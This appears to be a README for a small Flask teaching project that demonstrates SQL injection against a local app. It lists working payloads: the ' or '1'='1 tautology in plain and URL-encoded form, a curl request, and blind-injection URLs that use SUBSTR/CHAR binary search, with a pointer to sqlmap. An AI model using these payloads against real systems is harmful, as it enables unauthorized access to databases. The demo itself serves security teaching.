[An Introduction to Python's Flask Framework]: http://net.tutsplus.com/tutorials/python-tutorials/an-introduction-to-pythons-flask-framework/

# SQL Injection Examples

## Installation
- Read [An Introduction to Python's Flask Framework][An Introduction to Python's Flask Framework] first
- Use virtualenv
- pip install -r requirements.txt
- copy appconfig.py.default to appconfig.py
- Modify it for your environment
- python injection.py
- Go to [http://localhost:5000](http://localhost:5001)


## SQL Injection
- ' or '1' = '1 is Evil
- google://' or '1' = '1
- URL Encoding
    - ' or '1' = '1
    - %27%20or%20%271%27=%271
- Try to execute `$ curl "http://localhost:5000/injection/user/hubert%27%20or%20%271%27=%271"`


## Blind SQL Injection
- google://blind sql injection cheat sheet
- Use binary search
    - http://localhost:5000/blind_injection/user/1%27%20AND%20SUBSTR%28name,1,1%29%20%3E%20CHAR%2850%29%20AND%20%271%27=%271
    - http://localhost:5000/blind_injection/user/1%27%20AND%20SUBSTR%28name,1,1%29%20%3C%20CHAR%2850%29%20AND%20%271%27=%271
- Use Tools
    - sqlmap: https://github.com/sqlmapproject/sqlmap
